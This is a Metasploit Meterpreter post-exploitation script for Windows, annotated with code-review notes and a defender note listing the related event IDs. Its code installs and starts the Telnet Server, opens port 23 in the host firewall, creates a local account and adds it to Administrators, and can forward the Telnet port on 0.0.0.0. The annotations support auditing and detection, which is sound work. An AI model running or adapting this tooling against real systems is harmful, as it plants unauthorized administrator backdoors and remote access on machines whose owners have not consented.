Path: blob/master/scripts/meterpreter/gettelnet.rb
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##


# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
# Summary (from the code below): on a Windows Meterpreter session this script
# can (-e) install/enable the Telnet Server service (TlntSvr), set it to start
# automatically and open TCP 23 in the host firewall, and (-u/-p) create a local
# account and add it to the TelnetClients and Administrators groups. Undo
# commands for some of these steps are appended to a resource file under the
# Metasploit log directory.
#
# Defender note: every change is made with stock Windows tooling (ocsetup, sc,
# netsh, net user, net localgroup) plus reads of the TlntSvr service key.
# With account-management auditing enabled, the account creation and the
# Administrators-group addition typically surface as Security events 4720 and
# 4732; the service start-type change is normally recorded by the Service
# Control Manager (System event 7040). Where process-creation logging captures
# command lines, the "net user ... /add" line contains the password in clear.
################## Variable Declarations ##################
@client = client
# NOTE(review): host_name is assigned here but not referenced again in this script.
host_name = client.sys.config.sysinfo['Computer']
# Create Filename info to be appended to downloaded files
# NOTE(review): the format has no hour field (%H) - it is date, then minute and
# second - so runs in different hours of the same day can produce the same name.
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")

# Create a directory for the logs
logs = ::File.join(Msf::Config.log_directory,'scripts', 'gettelnet')

# Create the log directory
::FileUtils.mkdir_p(logs)

# Cleanup script file name
@dest = logs + "/clean_up_" + filenameinfo + ".rc"

# Option table: the boolean says whether the switch takes a value.
# NOTE(review): "-f" is declared as taking a value, but the parser block at the
# bottom of the script never stores that value.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-e" => [ false, "Enable Telnet Server only." ],
  "-p" => [ true, "The Password of the user to add." ],
  "-u" => [ true, "The Username of the user to add." ],
  "-f" => [ true, "Forward Telnet Connection." ]
)
# Reports whether the Telnet Server service appears to be present by reading the
# "Start" value of the TlntSvr service key.
# Returns true when the read completes without raising, false when it raises.
# NOTE(review): "installed" is inferred only from the absence of an exception;
# confirm that registry_getvaldata raises (rather than returning nil) when the
# key does not exist.
def checkifinst()
  # This won't work on windows 2000 since there is no sc.exe
  print_status("Checking if Telnet is installed...")
  begin
    registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\","Start")
    return true
  rescue
    return false

  end
end

#---------------------------------------------------------------------------------------------------------
# Installs the Telnet Server optional component when the reported OS string
# matches Vista/7/2008 and checkifinst() says it is missing; on a 2003 match it
# only appends a registry line to the cleanup file.
# NOTE(review): the OS pattern is unanchored, so the bare "7" alternative matches
# any OS string that contains the digit 7.
def insttlntsrv()
  trgtos = @client.sys.config.sysinfo['OS']
  if trgtos =~ /Vista|7|2008/
    print_status("Checking if Telnet Service is Installed")
    if checkifinst()
      print_status("Telnet Service Installed on Target")
    else
      print_status("Installing Telnet Server Service ......")
      cmd_exec("cmd /c ocsetup TelnetServer")
      prog2check = "ocsetup.exe"
      found = 0
      # Poll the process list while the installer is running.
      # NOTE(review): found is set to 1 for every entry and back to 0 only on a
      # name match, so after a full pass it reflects only the last entry listed;
      # an empty process list would leave it at 0 and the loop would not end.
      while found == 0
        @client.sys.process.get_processes().each do |x|
          found =1
          if prog2check == (x['name'].downcase)
            print_line "*"
            sleep(0.5)
            found = 0
          end
        end
      end
      # Record the matching uninstall command in the cleanup resource file.
      file_local_write(@dest,"execute -H -f cmd.exe -a \"/c ocsetup TelnetServer /uninstall\"")
      print_status("Finished installing the Telnet Service.")

    end
  elsif trgtos =~ /2003/
    # No install step on this branch: only a cleanup line that sets the
    # service's Start value to "1" is written.
    file_local_write(@dest,"reg setval -k \"HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\\" -v 'Start' -d \"1\"")
  end
end
#---------------------------------------------------------------------------------------------------------
# Sets the TlntSvr service to automatic start and starts it when its "Start"
# value is not already 2, then enables TCP port 23 in the host firewall.
# NOTE(review): nothing is appended to the cleanup file here, so the start-mode
# change, the running service and the firewall opening are not reverted by the
# generated .rc file and remain on the host until removed by other means.
def enabletlntsrv()
  key2 = "HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\"
  value2 = "Start"
  begin
    v2 = registry_getvaldata(key2,value2)
    print_status "Setting Telnet Server Services service startup mode"
    if v2 != 2
      print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
      cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
      cmmds. each do |cmd|
        cmd_exec(cmd)
      end
    else
      print_status "\tTelnet Server Services service is already set to auto"
    end
    # Enabling Exception on the Firewall
    # Runs on both branches above, whether or not the start mode was changed.
    print_status "\tOpening port in local firewall if necessary"
    cmd_exec('netsh firewall set portopening protocol = tcp port = 23 mode = enable')

  # NOTE(review): rescuing ::Exception also traps interrupts and exit requests;
  # the error is only printed and execution continues with the caller.
  rescue::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
  end

end
#---------------------------------------------------------------------------------------------------------
# Creates a local account and adds it to the TelnetClients and Administrators
# groups; despite the name, nothing in this method is RDP-specific.
#
# username - account name, taken from -u
# password - account password, taken from -p
#
# NOTE(review): the password is printed in clear to the console (and to anything
# that records console output), and both values are interpolated into the
# command lines without quoting or validation.
def addrdpusr(username, password)
  print_status "Setting user account for logon"
  print_status "\tAdding User: #{username} with Password: #{password}"
  begin
    cmd_exec("net user #{username} #{password} /add")
    # The delete command is recorded without checking the result of the add.
    file_local_write(@dest,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")
    print_status "\tAdding User: #{username} to local group TelnetClients"
    cmd_exec("net localgroup \"TelnetClients\" #{username} /add")

    print_status "\tAdding User: #{username} to local group Administrators"
    cmd_exec("net localgroup Administrators #{username} /add")

    print_status "You can now login with the created user"
  # NOTE(review): same catch-all as in enabletlntsrv; failures are printed only.
  rescue::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
  end
end
#---------------------------------------------------------------------------------------------------------
# Prints the script banner.
def message
  print_status "Windows Telnet Server Enabler Meterpreter Script"
end
# Prints the usage text and option table, then ends the script by raising
# Rex::Script::Completed.
def usage
  print_line("Windows Telnet Server Enabler Meterpreter Script")
  print_line("Usage: gettelnet -u <username> -p <password>")
  print_line(@@exec_opts.usage)
  raise Rex::Script::Completed
end


#check for proper Meterpreter Platform
# Prints an error and ends the script by raising Rex::Script::Completed.
def unsupported
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end


################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
frwrd = nil
enbl = nil
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-u"
    usr = val
  when "-p"
    pass = val
  when "-h"
    usage
  when "-f"
    # Only the flag is recorded; val (the argument given to -f) is discarded.
    frwrd = true
  when "-e"
    enbl = true
  end

}

# Stop on anything that is not a Windows session.
unsupported if client.platform != 'windows'

# Work is done only with -e, or with both -u and -p; anything else prints usage,
# which raises and so ends the script before the forwarding block below.
if enbl or (usr!= nil && pass != nil)
  message
  if enbl
    insttlntsrv()
    enabletlntsrv()
  end
  if (usr!= nil && pass != nil)
    addrdpusr(usr, pass)
  end
  print_status("For cleanup use command: run multi_console_command -r #{@dest}")

else
  usage
end
# NOTE(review): lport is not assigned anywhere in this script; unless the
# runtime supplies it, interpolating it below raises NameError when -f is given.
# The forward is also requested with -L 0.0.0.0, i.e. not limited to loopback,
# so the forwarded Telnet port would be reachable by other hosts that can reach
# the listening machine.
if frwrd == true
  print_status("Starting the port forwarding at local port #{lport}")
  client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p 23 -r 127.0.0.1")
end